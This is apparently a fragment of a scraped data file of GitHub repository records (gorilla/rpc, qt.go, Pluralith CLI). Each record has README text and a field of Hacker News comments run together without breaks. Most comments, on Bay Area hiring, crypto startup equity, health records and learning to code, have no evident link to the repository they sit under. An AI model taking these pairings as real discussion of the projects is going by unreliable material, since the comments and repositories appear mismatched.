Deployment\n\nThere is always more to do:\n\n1. Allow LifeCycle Hooks to send to Cloudwatch.\n1. Subnet, AMI, life cycle and userdata overrides per service.\n1. Check EC2 instance limits and capacity before deploying.\n1. Slowly scale (Canary) instances up rather than all at once, e.g. deploy 1 instance check it is healthy then deploy the rest.\n1. Add ELB and Target Group error rates when checking healthy.\n1. Custom auto-scaling policy types.\n\n", "readme_type": "markdown", "hn_comments": "This is a really fast route to failure. If building a bot was easy, everyone would be doing it (and successful at it).Never double down gamble when you're desperate.You kind of already touched on one of the main reasons: there\u2019s a regulatory framework in place for an IPO in their operating jurisdiction. There is still a lot of ambiguity and regulation to come for ICO\u2019s and they (rightfully) don\u2019t want to risk their company until those get ironed out.Exit liquidity. Investors cashed out as soon as Coinbase went public. They wanted their money \u201cback\u201d as legal as possible. That\u2019s it.> Wouldn't that have shown a real belief in what they are doing?Just because Coinbase operates within the crypto space doesn\u2019t mean they must themselves embrace and utilize every mechanism within the space. Even if they believe in ICOs specifically, they may have not made sense for their specific business (see other comments about regulation)I believe remote work has two futures.The first is many companies will return to requiring a majority of time in the office. There are admittedly hard to measure reasons management will want back in the office, and the first is productivity (I don\u2019t mean how much an IC produces, but how much revenue per employee a firm generates).The second future is all our tech jobs get offshored, similar to what happened after the dotcom bubble burst.I believe that companies will probably wind up going to future #1. Or at least companies that are heavily invested in R&D.There will probably be more satellite offices and more geographically distributed tech startups.But in the first future I believe SF and Silicon Valley will still serve as one of the largest tech employment hubs. For example NYC is still a major financial hub, despite major top-25 US banks being headquartered in places like Texas, Virginia and North Carolina.Edited to comply with Dang\u2019s reminder of site guidelines.I've always understood the alure to the bay area wasn't the talent but the talent with the correct mindset.For example, getting software devs that are willing to work long hours to push out a new release. etc.take this with a grain of salt as i've never been to the bay area.No.Once the pandemic is over, startups that are in-office will be more productive and faster than bigger companies. The bigger companies will notice this, and force in-person/in-office as well and remote will quickly devolve.Remote is survivable, mainly because of the pandemic, but it\u2019s not preferable for business. In-office is much more efficient and it will be immediately evident once it is enforced.I've been a part of two large companies that have made a conscious move away from hiring in the Bay Area. For both of these companies, the major drivers were that the market is so saturated there that it's harder to find people there.COVID forcing remote work was that tipping point. I think it was a lot more tenuous beforehand than generally believed due to the cost of living. Great programmers can come from anywhere with the internet.California has some of the most stringent COVID restrictions in the US, and also the highest costs of living when looking at Bay Area and LA. There's no point to bring people there, especially if they're just going to working from home for the foreseeable future anyways.I've been remote for several years (pre-COVID). For $600k, they could hire 2 or 3 engineers where I live, still doubling or tripling the local tech pay, and give those engineers the opportunity to buy (or build) and pay off a house in a few years.Coinbase and Stripe are not startups. They are institutions.The hacker houses here are still rammed to the gills.A ton of companies outside FAANG are emerging as both 100% remote and async-first. Of course this doesn't make them perfect but they are succeeding both commercially and culturally. As soon as x number of Zapier's in the world who grew and attracted talent from all over, this will become the default way of working and building companies and the Bay Area will be way less relevant.> out of the ordinary housing market in the Bay Area when you compare it to other cities in CA like San Diego and Los Angeles.Many of the high-paying tech jobs in Los Angeles are consolidated in the Venice Beach area, so-called \u201cSilicon Beach.\u201d If you think you can get an affordable house in the desirable neighborhoods around there (Santa Monica, Manhattan Beach, Venice, Brentwood), you\u2019re in for a shock.You might try heading inland to Inglewood or Culver City to save money, but you\u2019ll be looking at $1.5M houses with bars on the windows. Prices have just gone insane over the last couple years.Plus, if you\u2019re hoping to escape the crime and addicts of the Tenderloin and Market Street, Venice won\u2019t offer much relief.How about we look at the numbers?: https://www.zumper.com/blog/rental-price-data/Y/Y: It looks like NY, SJ have recovered (at least for the single bedroom) while the Bay Area is lagging. Some winners are Miami, San Diego, and Orlando. It seems that Florida has seen the highest rise in rental costs. Some losers are Newark, Virginia, St Louis. It seems the shittier cities have lost the most, and the sunnier/friendlier ones have won. In that sense, San Francisco has done averagely.Based on that, I don't think SF/Bay Area is going downhill as people are imagining. They are doing much better than other places especially that they are already very expensive.It's funny that no one wants to admit that Covid-19 was the forcing function for shifting to remote wholesale. I have many peers who have been fighting for internal accessibility of working remotely, most of whom gave up and jumped ship. I even know a few people who left Stripe in 2019 due to their inflexible remote work policies.So to now come out and say \"look at all the remote hiring we're doing\" sure leaves a bad taste in my mouth. Yeah, because you have no choice!The talent has realized they have all the cards and bargaining power in terms of remote work right now. Anyone who is fighting to return to the office is missing the point. We should all be striving to unlock permanent mobility within our professions.> I am assuming that many positions that require the candidate to (eventually) relocate to the Bay Area are not getting a lot of traction. A fried of mine refused to interview for position like that despite being very junior! She decided the cost of living is not worth it.Cost of living is high, but for a junior engineer I think it might be possible for a good case to be made that it is worth it assuming that the junior engineer has a fairly recent bachelor's degree from a good college.One of the lessons you should have learned incidentally while getting your degree is that if your rent and utilities and much of your food are covered and you are busy enough that you don't have a ton of free time you can get by for at least 4 years without having much extra money.The median household income in San Francisco is $112k per year. The average household size is 2.26 persons.This means that half the households in San Francisco are getting by on less than $112k per year. That's for everything--rent/mortgage, food, utilities, insurance, transportation, clothes, entertainment.I'd consider if I was a junior engineer taking the San Francisco job if it paid significantly more than $112k, and then for the next few years live like I lived in college. Live in the kind of housing that the people who are making under the median household income live in, and everything you make that doesn't go to living in that housing with a lifestyle similar to a college student put in in your 401k or other investments.You already know from college that you can live this way for 4 years and come out OK. If you can just do that for a few more years, you can have some nice savings built up. Then you can figure out if you want to stay in San Francisco but upgrade your lifestyle, or move to someplace cheaper, but with a nice fat portfolio of savings and investments that will serve you very well later.How about taxes? In my East-European country I am paying about 10% net on taxes (including social and health, including expenses, excluding VAT). Nothing illegal or offshore, just normal accounting from local semi retired lady.In Cali I would have to juggle with deferred stocks, exit taxes, local taxes, federal taxes etc.. And net salary would be about same.No one has yet brought up an essential issue: California bans non-competes. https://www.vox.com/new-money/2017/2/13/14580874/google-self.... As long as California does, and most other places allow them, we're going to continue to see surprisingly high levels of startup formation and company success in California, despite all the bad things being true.It's hard to say for sure but I think probably yes. It was essentially an accident that the bay area tech scene ever existed at all and other than nerds writing code and VC's getting rich I don't know how much residents of the area even liked it.The way to make the bay sustainable is to build taller buildings for people to live in. However this isn't especially popular and even if it was, there is enough bureaucratic cover for a minority to stall it off indefinitely.I think if you could do that in the next 20 years the bay could maintain it's hegemony. Seems exceedingly unlikely to me.I suspect it will keep enough momentum to beat out most markets for some time to come, though already by a smaller margin and with a seemingly worse quality of life these days.Expanding out of the Bay Area has been standard practice basically forever.Unless a company has infinite budgets and plans to maintain small org sizes forever, keeping your entire workforce in the Bay Area doesn\u2019t really scale.The real question to ask is: Where are these new jobs? Remote? Satellite offices? New foreign offices? Remote is the hot topic, but I haven\u2019t actually seen as many remote listings as I expected given all of the talk. For many of these companies, it could be as simple as opening new offices in other cities. If they\u2019re opening offices in expensive locations like Seattle or NYC then it\u2019s not really about cost of living.On the other hand, if they really are embracing remote and hiring out of non-traditional locations then maybe it is more about cost of hiring. However, in that case I\u2019ve personally experienced companies become eager to skip the US altogether and start hiring in even cheaper international locations with untapped talent. It\u2019s complicated.> Talent in the Bay Area are fetching astonishing pay ($600k for L6)While it\u2019s true that top Bay Area engineers can fetch $600K, it\u2019s much more rare than it can look. Take a look at the median compensation for software engineers in the Bay Area some time. It\u2019s a fraction of that number. Those ultra high paying FAANG jobs aren\u2019t the typical software job, even in the Bay Area.> A fried of mine refused to interview for position like that despite being very junior! She decided the cost of living is not worth it.Top Bay Area compensation should be enough to offset the higher cost of living for someone living in an apartment. The cost of living for something like a 1 or even 2-bedroom apartment is negligible for someone who can get into a FAANG job in the Bay.On the other hand, taking a median software job in the Bay Area is definitely not worth the cost of living increase, IMO, unless you\u2019re using it as a pivot into a FAANG level job later.When you can't address basic Maslow levels (food, housing, etc.) financially, you definitely are incapable to supporting top level Maslow levels which are central to innovation, creativity and improvement.https://en.wikipedia.org/wiki/Maslow's_hierarchy_of_needsThe SF Bay Area crossed over that boundary a fairly long time ago.I finally gave up in 2016 after being born and raised in California and have decades of Tech career in the SF Bay Area. It's no longer viable for ACTUAL innovation there. For the most part there is no technology innovation happening in SF Bay Area Tech companies anymore. There is plenty of revolutionary political innovation but nothing in technology and the direction of that is distinct ANTI-innovative.Innovation no longer requires being in the SF Bay Area to be achieved. My recent formation of a new Tech company (in 2016 in upstate NY) and sale/exit in 2018 proves it to me. YMMV of course.The \"Open Secret\" is there was always a \"bunched distribution\" at the top of the talent scale in SF/Bay Area that really only made it worth it for the FAANG-level orgs over the last decade or so. The top 10-20%? Absolutely better there in terms of talent than anywhere else in the country. Below that, you're just paying 500K when you could get an engineer of equal/better skill anywhere else for 120K. It makes sense for FAANG to lock up that top 20% with 500K salaries... it does not make sense for companies that aren't going to get one of those engineers to try and swim in that pond unless you're making a serious run at being in that level. It really hasn't for the last decade, COVID just made the music stop for a moment and forced everyone to reckon with that.For Stripe/Coinbase, 74%/89% eng hiring out of Bay Area. Today, a lot of that hiring could be happening in other parts of the US. But before you cheer too much about that, consider that the shareholders of those companies are already looking for ways to hire outside US. After all, if your setup can accommodate someone from Kansas, how hard is it to onboard someone from Canada or Mexico?A data point - my company is already hiring more than half of the new hires outside the USA. Or to paraphrase a politician, that whirring sound you are hearing is one of the last remaining sources of good jobs getting sucked out of the country.Previous discussions: https://news.ycombinator.com/item?id=27696235 and https://news.ycombinator.com/item?id=29784222I sure hope so, maybe my friends who grew up in the Bay Area who are not techies will be able to move back home if they want to.The problem is regulatory restrictions, that since 2017, have been used to shut off capital flows to token sales.Token sales were one of the most promising avenues toward the goal of widening the base of individuals that could participate as investors in the venture capital market:https://link.springer.com/article/10.1007/s11408-020-00366-0...\"The average ICO has almost 4700 contributors. The median contributor invests a relatively small amount. The ICO market appears to have successfully given access to the financing of innovation to a new class of investors, which is a long-standing public policy issue\"That being said, it's possible you could use the JOBS Act's provision for crowdsales to widen the base of individuals that could invest through your platform:https://en.wikipedia.org/wiki/Jumpstart_Our_Business_Startup...> Everyone here loves crypto (and have some) and loves startups too.Not true at all, many here on HN are openly hostile towards it because they dismissed it at the time while others were made obscenely wealthy. Whether they own some is probably true, though.> I want to create a coinbase for startup equity. Translation :you invest small sums of your cryptos in a startup of your choise.First, you don't want to be the 'Coinbase' of anything... Really, its a horrible company run by what seem like the most incompetent staff they pouched from MtGox and I squarely blame YC and tyical SV insider tactics for what it's doing.With that said: it's a cool idea that many of us have had throughout the years since Mike Hearn wasted funds on Lighthouse and pretty much abandoned a mediocre solution to a pressing problem and left everyone with a bad taste in their mouth about such a thing.> Persuade me that it won't work with arguments based on 1-3.Preface, I've been in the community since Satoshi was still on BTF: it's not that it won't work, in fact things like Pineapple Fund, Sean's Outpost/Satoshi Forest shows that many of us in the Bitcoin community are incredibly generous (with time and money) and want to use this tech to solve many problems that Megacorps profess to care about and want to solve, but amounts to merely fluff to sell to their PR departments.1: Some of have tried, but nothing worth talking about since Lighthouse.Boost VC is probably the closest thing I can think of, and their are other incubators that are open to Crypto based projects (I pitched at a meetup in Boulder and a person from Techstars followed up).2: It's tricky, but if you remain in Bitcoin-only ecosystem their are few to no regulations or bylaws depending on where you operate from--this is a feature, not a bug. But this opens the need for arbiters and custodianship, which is frowned upon since this is supposed to be a trust less based system, but really that is what things like multi-sig escrow and smart contract oracles are for.Reputation matters in Bitcoin, and contributors like Andreas who have made Bitcoin their life's work with little to no compensation were later rewarded by the community--and he deserved it!Bitcoiners, the early adopters more so, are seriously the most paranoid people in the tech World outside of say whistle blowers working for Intelligence firms in my opinion--and some like Reality Winner really didn't do a good enough job to be on par with someone who sent $50 to a DNM back in the early days.3: Many issues here, to many to outline them all.But as mentioned before its creating a trustless transparent system; which will be your biggest hurdle since I'm guessing you don't have any credibility in this ecosystem either.Second, what is the ROI on this, otherwise what you are trying to create is just a charity with no real sustainable growth model. Even Non-profit/NGO often have some outside funding from a foundation or a vested party interested in maintaining it's existence. Think about who would want you to stay alive and work back from that.The newest wave of Bitcoiners since 2017 (2013 really) are the money-centric ones that likely won't fund any of the projects like that I mentioned before to help causes.Personally speaking, I'm moving to more Bitcoin friendly countries/environments for this is exact reason. The US is stifling progress and other countries have a more favorable view on Bitcoiners and their businesses, so I'm off to greener pastures.But, I need some time away from this Industry--I had my own fintech startup in BTC for ~5 years and disrupted an entrenched Industry in that time, and then got into the enterprise 'blockchain solutions' department for a Megacorp.If you're looking for consultant I'd be willing to do that in the interim, but if you give me 6-12 months I could join the team and do some legwork as I could probably be of more use then and tell you where/how to incorporate and what are potential strategies for not just taxes but also securing your streams of revenue etc...Do you have a Github or any portfolio of past projects? Your post history doesn't seem to reveal much other than a job posting for a freelancer.\"Everyone here loves crypto (and have some) ...\"Hahaha ... I think you are new to HN.Why would a startup want this?How is it better for a startup than ordinary currency?How is it better for a startup than experienced investors?How is it better for a startup than common investment vehicles?What is the obvious business case for the additional complexity and potential legal land mines?That idea was initiated in the ICO boom and failed miserably.Most of the money was either blatantly stolen, hacked or the companies went broke when the price of bitcoin dropped by 80%.1. It sounds like you're effectively making your own stock exchange, but with crypto instead of cash. I imagine the SEC will have many things to say about that. It could be legal, but you're not going to like the laws they'll make you follow.2. In a real stock exchange, the company value is largely the volatile thing. In one backed with crypto, the price of a company will fluctuate more from the asset you're buying it with than the company's activity itself. If the price of bitcoin goes up, I own the same number of shares but worth fewer bitcoins. That seems like not what folks into crypto care about.3. If a company puts all of its shares into this, it likely cannot ever ipo. That's going to turn off most investors. I would expect it's an all-in endeavor.4. Companies accidentally losing their private key for unissued shares sounds like a very bad failure mode.Could you clarify how this has anything to do with crypto?It seems to me that you're acting as a fundraising platform: people give you money, you pass it on to startups, and you guarantee these people that they own some equity in the startup.The concept of \"own some equity\" is a legal concept, and this is what you have to nail down. Crypto is irrelevant to this conversation.Is there a reason to do this via crypto vs...any other way?Aren't there rules / laws about selling equity in a company?What good are these small sums?I see an issue with the volatility of investment being paired with the volatility of crypto currencies. It\u2019s like gambling turned to 11.Are startups willing to take crypto in exchange for their share?I had this idea in 2016, i.e. offer a platform that lets people register their startups, they hire people + provide a service and enable them to provide equity securities to their employees + the founders (still using traditional contracts that represent the actual legal structure in the form of real-world legally binding contracts with a simultaneous existence as security tokens or whatever financial instruments make sense to early-stage startup employees) but issue ICO-based denominated shares that are then owned by the employees by their holding of the private keys of the wallet - could be operationally similar to ownership of present day ERC-20 tokens), and then enable them to be traded on DEXs if the employee has already vested parts of the crypto-shares/ERC-20 equivalent tokens. The real expense comes in a bit with the requirement of needing to still have a valid legal structure in place with contracts, with specific terms that still are valid with the existing legal framework in whatever country the platform would support. It is for sure viable but will require a lot of capital for regulatory compliance, and also will need to compete in the longer term against better capitalized companies like Coinbase that already have all the necessary traditional banking relationships and other tech companies that operate in adjacent DeFi fields (if they ever decide to compete, of course).Like Coinbase could acquire Carta or one of those other startup equity focused companies and then use that user data to focus on the best startups to trial this concept with, and then roll it out publicly and then just totally kill your idea. I think it's definitely a good application of the technology and the existence of such a platform would structurally strengthen the crypto ecosystem over the long term.The fact that Coinbase did a DPO instead of some kind of fancy DeFi-based offering is telling in their potential lack of conviction in the ability to offer public securities at this stage in the game through some of these smart contract based platforms. I'm sure @barmstrong and the Winklevoss brothers have spent a lot of time thinking about thisBinance is already tokenizing equity on the public market (like Tesla stock). You may want to look into how they\u2019re doing it.I'd guess the answer is the same as - Why isn't Kickstarter doing this?From your research why isn't Kickstarter doing it?How about you flip this question and ask people why it will work. I mean at least for me , I got so many naysayers around me so that I don't have to go HN and ask why my idea is bad :)It is the initial coin offering thing coupled with a good user interface?1. Only Accredited investors can invest in private startups.2. Equity crowdfunding is a way around 1. but only too restrictive- limited fundraising, more disclosure, and follow-on venture/ traditional funding hard to come by.Above is US-centric view. Using crypto instead of fiat currency is not a workaround regulations and reputation.But look at BlockFi, it might offer you insight into workaround using crypto to raise an Angel/VC fund from crypto millionaires.Everything crypto is a ponzi schemeThese do already exist and there are many of them already on both Ethereum and Binance Smart Contract networks. More will be coming with SORA/Polkadot and I suspect it won't be long before they are on Harmony, as well (basically any EVM compatible network will likely have these).I'm not sure exactly on the terminology, but essentially most large DEXes (Decentralized Exchanges) will typically get involved in funding new coins. Typically what happens is a DEX will (either through governance of via the DEX developers) offer to \"host\" a new coin in their liquidity pools on the DEX, and boost that coin by incentivising users with additional rewards for proving liquidity (typically in the form of tokens for that given startup). These incentivised liquidity pools are called \"farms\" and launching a crypto startup in this way is typically called a \"Initial Farm Offering\" or \"IFO\".There are also more projects on the horizon that aim to further this idea of providing liquidity to developers in exchange for coins.Actually a lot of people here hate crypto for various reasons. One big one is the disastrous environmental impact of the proof of work algorithm (yes we know Ethereum will try proof of stake soon since years).1) innovation: a lot of people are already investing in startups. The main value of your idea is to do something existing, but with crypto. Which has most likely already been tried. It's not necessarily a bad idea. The execution is probably more important than the initial idea.2) legal issues: why would using crypto avoid you the regulations ? I feel like it will make everything more difficult and confusing for everyone if you want to do it legally.3) usability: you will most likely target a very small group of experts. crypto are not user-friendly.Your startup idea may work. Some people are very much into crypto and you could target them. Personally I would consider the impact of my work to the society. The proof of work is a no-go for me, but you may not care.Biggest trade:WILSON FREDERICK R / UNION SQUARE VENTURES 2012 FUND LP2021-04-14Sale-3,755,323 (number of shares)$388.89 (price per share)-1,460,403,806 ($ value)168,736 (shares after)", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gorilla/rpc", "link": "https://github.com/gorilla/rpc", "tags": ["go", "rpc"], "stars": 535, "description": "A golang foundation for RPC over HTTP services.", "lang": "Go", "repo_lang": "", "readme": "rpc\n===\n[![Build Status](https://travis-ci.org/gorilla/rpc.png?branch=master)](https://travis-ci.org/gorilla/rpc)\n\n---\n\n**The Gorilla project has been archived, and is no longer under active maintainenance. You can read more here: https://github.com/gorilla#gorilla-toolkit**\n\n---\n\ngorilla/rpc is a foundation for RPC over HTTP services, providing access to the exported methods of an object through HTTP requests.\n\nRead the full documentation here: https://www.gorillatoolkit.org/pkg/rpc\n", "readme_type": "markdown", "hn_comments": "Seems like the key hurdle here is to get doctors interested in a new info platform. Why if it was consumer led, with current/prospective patients voluntarily update a profile that doctors could access?on app store examples.. my chart CHmychart, trinityhealth...etc... recently had someone I know from the south move up north and the doctor could not see their prior info. Which would have and did save a lot of test from not being done over again. They even include current picture, which they did not have a year ago for annual physical. LabCorp performs blood test in their own facility and have the ability to change personal info if you approve w/ ID. not needing an individual of \"management\" to do so, this could allow easy manipulation of info.. and how many years of history does each doctor need to see or allowed to see, how do patients get control over this? 3 years, 5 yrs, 10 + back... and since different hospitals used different software St. Jude hospital records dont show up on the EHR which shows all City hospitals. insurance needs to find a new EHR system advantages as soon as S.S info input by doctors, not sure how it pans out with countries without S.S numbers (have multiple ID's)Your competitor may have crazy momentum today, but who knows about the future. Companies with bright futures blow themselves up all the time.Startups with momentum that don\u2019t self-destruct are likely to get acquired. VCs happy, founders happy. Senior engineers will bail soon afterward and the mood will change. More unhappy people on twitter. Bugs linger and don\u2019t get fixed. The business is now focused primarily on getting larger customers or expanding to different markets.And that leaves you with plenty of opportunity. It might not look like it now, but their 15 minutes won\u2019t last forever. Be happy for their success and be happy that they\u2019re expanding the size of the market for everybody. Keep plugging away and focus on your customers.In answer to both parts of your post: you're a clear communicator (you outlined the situation concisely and effectively, and everyone commenting in response so far has found a common understanding of that) and you're approachable and thoughtful. It'll take time but those are valuable compounding traits to have; carry on with them and try to hone them.1) Find what their customers are complaining about on their forums, blogs, and social media.2) Fix those problems. Tell the VCs you're better because you have fixed these problem.I don't mean bug fixes, I mean conceptual problems, fwiw.Easy, don't focus on them. Get yourself happy customers and solve problems your customers have. Be the competitor that offers exceptional customer service and goes the extra mile.There is a lot of room in these markets.Difficult to say at this level of abstraction, but there's one strategy that we see quite often. - Identify shortcomings in ABC, particularly on the intersection with other software, integrations or edge cases for specialized users \n - Build feature spikes in your project for those cases \n - Market your product around thise cases - ie. have dedicated pages where you have a hook \"Better alternative to ABC for veterinarians\"Read Jason Cohen\u2019s blog.https://blog.asmartbear.com/youre-a-little-company-now-act-l...https://blog.asmartbear.com/unfair-advantages.htmlWell, without knowing what the product is, the advice could be rather limited. You can offer better support or you can offer something that a big company cannot afford like data exportability. VC financed companies need to show exponential growth to justify their valuations while you maybe can afford to invest in your users that is not profitable but that might give you an advantage in the long term.As always, read whatever patio11 wrote about that. For example:\"Wufoo + Free Incentivization = Cheap, Effective User Surveys\" https://www.kalzumeus.com/2010/01/17/wufoo-free-incentivizat... (No HN discussion)\"Your first ten customers: How should you communicate with customers?\" https://stripe.com/atlas/guides/starting-sales#how-should-yo... (HN discussion https://news.ycombinator.com/item?id=15534034 598 points | Oct 23, 2017 | 133 comments)Can I add my own advice: In a previous post you said that you are using surveys. How long are them? I have very little patience and I'd answer only 2 or 3 questions, like* Do you have any comment or feature request?* Email/phone to ask more about this. (optional)* [Not enough patience. I ignored the third question and closed the browser!]Probably people has more patience than me, but try to make it short.> \"how is this different from ABC?\".What's your answer to this? I'd expect a pretty good range is possible without any changes to product, from \"you get support direct from the engineer and CEO?\" to \"Can ABC do this...?\"Related to the pitching or communications aspect, is it really a clone, or is it a clone-if-you-ignore-the-various-details? Those are way different.Do you support charities, do you have a cuter mascot, do you regularly integrate direct client feedback, do you send out a mixtape every year?Hang in there, define your goals, it really sounds to me like you are already done being awesome and are poking at legendary, wondering where the back door is. Could be really great from here, or it could be that this is more like a side gig to support your full set of life interests...> My question goes out to anyone familiar with this situation: how do you change your product strategy to be successful despite an 800-lb gorilla in your market?Happy to discuss more in details but if that 800-lb gorilla is VC funded, depending on the details, it's extremely likely they will fail and you will enjoy the rush of customers who are left hangingI switched from Windows to Mac in 2009 for professional reasons and the Mac software landscape at the time was far from what it is today. I got very keen on getting some tried and true Windows software to work on Mac which in some cases led me to discover half-baked open source software solutions that barely worked and were unmaintained. I guess this was the first time I thought to myself: \"Gosh, wouldn't it be nice to know how to program.\"I taught myself C at the age of 25 and approached a computer science degree shortly afterwards. That open source software is still unfixed but I'm glad it sent me down this path.I started coding when I was 12-13, when me and my bro got a C64 for Christmas one year. I learnt Basic and quickly moved onto 6502 assembly language, learning to hack games for infinite-lives, level selection, etc., plus a little bit of demo/intro coding. I learnt a lot by looking at the code of others \u2014 including much disassembling of object code. I was always interested in how folks were making things happen in games, how they were using the hardware.When I was 17, I dropped out of college to take a job in games development. My first dev system was a second C64, but was quickly replaced by a BBC Model B, which in turn was replaced with an 8Mhz 286 Tandon PC, 2mb of RAM, EGA graphics, 5.25\" floppy drives, 40mb HD, and a PDS card [0][1]. You'd assemble the code on the host, send it down to the target \u2014 IIRC, PDS had some handy debugging tools: breakpoints, single step, etc. Pretty impressive for the time, given the target platforms.Later I learnt some assembly language for other common processors at the time (z80, 68k, 8086), and also started learning C/C++.When the internet started to become more of a popular thing, I started learning both Javascript/variations and Java, and also picked up some VB skills.Mid-90s, somewhat tired of games dev, I transitioned from games to front- and back-end web-based stuff, spending a number of years with a fairly successful startup company specialising in e-commerce.Since then I've also learnt, and delivered projects in, a multitude of languages. Including (in no particular order) C#, Typescript, Python, Go.So I've been coding for maybe 35+ years now, just over 30 years of which have been commercially/professionally.I like coding. I am often particularly fascinated by interesting algorithms.[0] https://www.cpcwiki.eu/index.php/PDS_development_system[1] https://retro-hardware.com/2019/05/29/programmers-developmen...I was 8 years old in 1983 when my parents bought the original IBM PC model 5150. It had 64k of RAM, two 5\u00bc\" floppy drives, and a CGA video card. By the end of its life, it had 576k of RAM, a VGA video card, and 2 20MB MFM hard drives. Oh, and an NEC V20 CPU in place of the original 8088.I took a BASIC programming course at Radio Shack on the TRS-80 and was otherwise self-taught (sometimes learning /with/ my dad) until university. (I took computer science in high school, too, but didn't learn anything new :) )Also extremely grateful for these events!We recently interviewed an Azure expert who started at the age of 7 with simple commands.You might find it an interesting read = https://mindquest.io/blog/news/1900I learned how to program at school in 1973, when I was 17 on a machine similar to this one:\nhttps://en.wikipedia.org/wiki/HP_9800_series#Second_generati...It may seems a toy, but it was not, it had 8K bytes. It was a time where big computers in France had 128K bytes RAM.What is astonishing is that it was in Vannes, a small town in Brittany, in the west part of France.I often wonder how the Math teacher was able to get such a computer in his school.In 1979, I went to university to receive course advice in my chosen field, the adviser I got was trying fill the empty courses, not recommend what was best for me.One of the courses was computer programming in Pascal, offered for the first time. There were several hundred students enrolled and they ran duplicate day and night sessions of the course.The course was designed to make 'trial and error' programming as difficult as possible, so we would learn enough about the syntax to write working code straight up.For the 250 odd students they had 8 card punch machines. You had to punch out your cards, wrap them up and put them in the mail to be run overnight, you went back to pick up your finished program the next day.The 8 card punch machines were hammered 24/7 and by the end of the second week two broke down. A week later one of them would not punch the letter 'B'.Unfortunately the course took up as much time as my other 3 subjects so I withdrew, but I did learn a lot about programming, especially when I bought a decent programmable calculator. I did go on to do a bit more programming but it wasn't my main job.And the funny thing is that there's no app in Steam Right now to watch 360 videos from youtube on Vive. Google, you have great Tilt Brush. And no Youtube.Some useful shortcuts:r random collection.c create a collection.space stop music.] next track.[ previous track.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kitech/qt.go", "link": "https://github.com/kitech/qt.go", "tags": ["golang", "qt", "speed", "gui", "qt5", "android", "cross-platform", "go"], "stars": 535, "description": "Qt binding for Go (Golang) aims get Go's compile speed again.", "lang": "Go", "repo_lang": "", "readme": "\n### qt.go\n\nQt5 binding for Go (Golang) without CGO that aims to achieve Go's native compile speeds. Instead of using common bindings and heavy C++ wrapper code that forces you to compile and link time and time again, Qt.Go uses FFI so there's only a runtime dependency.\n\n[![Build Status](https://travis-ci.org/kitech/qt.go.svg?branch=master)](https://travis-ci.org/kitech/qt.go)\n[![Go Report Card](https://goreportcard.com/badge/github.com/kitech/qt.go)](https://goreportcard.com/report/github.com/kitech/qt.go)\n[![GoDoc](https://godoc.org/github.com/kitech/qt.go?status.svg)](https://godoc.org/github.com/kitech/qt.go)\n[![Sourcegraph](https://sourcegraph.com/github.com/kitech/qt.go/-/badge.svg)](https://sourcegraph.com/github.com/kitech/qt.go?badge)\n\n### Features\n\n* Binding code with no CGO compile cost\n* Popular Qt5 packages (widgets/QML/extras) support\n* Simple go-uic, go-rcc tools\n* full signal/slot support\n* protected method override support\n* default arguments and value wrapper functions\n* Class/Method/Function/Enum comment for godoc\n* Go side signal/slot definition (experimental)\n\n\n### Multiple platforms support\nAll platforms should be supported, for now some of them are tested:\n\n* Archlinux/Ubuntu16+\n* MacOS\n* Android\n* Windows\n\n### Installation\n\n##### requirement\n\n* go 1.9+\n* libffi\n* dlfcn (windows)\n\n\n##### FFI\n\nMake sure libffi is installed\n\nDebian based: `apt-get install libffi-dev`\n\nArch based: `pacman -S libffi`\n\nMacOS: `brew install libffi`\n\n##### qt.go:\n\n go get -v -u github.com/kitech/qt.go\n \n##### runtime dependency:\n\n git clone https://github.com/kitech/qt.inline.git\n cd qt.inline\n cmake .\n make\n cp libQt5Inline.so /usr/lib/libQt5Inline.so\n\n##### uic/rcc\n\n go get -v -u github.com/kitech/qt.go/cmd/go-uic\n go get -v -u github.com/kitech/qt.go/cmd/go-rcc\n\n[Full Installation](https://github.com/kitech/qt.go/blob/master/install.md)\n\n### Examples\n\n package main\n import \"os\"\n import \"github.com/kitech/qt.go/qtwidgets\"\n func main() {\n app := qtwidgets.NewQApplication(len(os.Args), os.Args, 0)\n btn := qtwidgets.NewQPushButton1(\"hello qt.go\", nil)\n btn.Show()\n app.Exec()\n }\n\nMore complex examples: https://github.com/kitech/qt.go/examples/ https://github.com/qtchina/qt.go.demos/ \n\nGo side signal/slot: [syntax document](https://github.com/kitech/qt.go/blob/master/docs/qt_meta_data_mark_syntax_for_go.md) [usage demo](https://github.com/kitech/qt.go/blob/master/qtmeta/tests/meta_data_test_.go)\n\n\n### Community\n\n * QQ groupchat 933636020\n * Telegram room https://t.me/qtdevjiaoliu (Thanks https://github.com/xiayesuifeng)\n\n\n### Internals\n\nQt.Go uses FFI to call wrapped Qt functions and methods, so there is no compile/link time dependency on Qt, only a run time dependency.\n\nThis should make the development and testing phases much faster.\n\n[Internal document](https://github.com/kitech/qt.go/blob/master/docs/qt-go-internals.md)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Pluralith/pluralith-cli", "link": "https://github.com/Pluralith/pluralith-cli", "tags": ["cli", "pluralith", "terraform", "cloud"], "stars": 535, "description": "A tool for Terraform state visualisation and automated generation of infrastructure documentation", "lang": "Go", "repo_lang": "", "readme": "![GitHub Badge Blue](https://user-images.githubusercontent.com/25454503/157903512-a9be0f7b-9255-4f88-9b00-9d50539dd901.svg)\n\n# Pluralith CLI\n\nPluralith is a tool to visualise your Terraform state and automate infrastructure documentation.\n\n`Pluralith is currently in Alpha`\n\n \n\n\n\n\n## \ud83d\udcd5 Get Started\n\nWe've got official docs to get you set up! \nClick the buttons below and jump right into it:\n\n[![CI Button](https://user-images.githubusercontent.com/25454503/179351758-7bfd8405-f58b-441a-ad3b-8c25f433faca.svg)](https://docs.pluralith.com/docs/get-started/run-in-ci)\n![Placeholder](https://user-images.githubusercontent.com/25454503/179351794-be200524-7a58-4243-9e44-efb9db7f0a93.svg)\n[![Local Button](https://user-images.githubusercontent.com/25454503/179351796-4164b3bb-947b-47dd-967b-43bbf815ae07.svg)](https://docs.pluralith.com/docs/get-started/run-locally)\n\n \n\n## \ud83d\udddd\ufe0f Key Features\n\n- Create beautiful `infrastructure diagrams` instantly with one single terminal command: `pluralith plan`\n- Automate your documentation by **[running Pluralith in CI](https://docs.pluralith.com/docs/get-started/run-in-ci)**\n- Highlight latest plan `changes` in the diagram\n- Detect and visualise infrastructure `drift`\n- Visualise the `cost` of your infrastructure in the diagram (via Infracost)\n\n \n\n![Bookface 